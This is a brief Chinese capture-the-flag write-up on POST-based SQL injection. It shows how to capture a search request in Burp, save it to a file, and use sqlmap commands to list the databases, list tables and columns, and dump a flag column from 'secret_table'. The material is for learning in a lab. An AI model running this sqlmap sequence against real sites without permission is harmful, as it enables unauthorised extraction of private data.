题目信息:
image.png
工具:bp,SQLmap
知识点:sql注入之post注入
打开题目,有一处搜索框,搜索新闻。考虑SQL注入。
image.png
随便输入一个2,用bp抓包,发现是post方式,然后Copy to file,将报文保存为txt文件。
image.png
保存为123.txt
image.png
然后用sqlmap一键注入(-r 表示从一个文件中载入HTTP请求,123.txt如果没有放到sqlmap目录就用绝对路径)
0x01:查找数据库
python sqlmap.py -r D:\SQLmap\123.txt --dbs
image.png
0x02:查找表
python sqlmap.py -r D:\SQLmap\123.txt --tables -D news
image.png
0x03:查找字段
python sqlmap.py -r D:\SQLmap\123.txt --column -D news -T secret_table
image.png
0x04:显示字段信息
python sqlmap.py -r D:\SQLmap\123.txt --dump -D news -T secret_table -C fl4g
image.png
参考:sqlmap用于sql注入语法
网友评论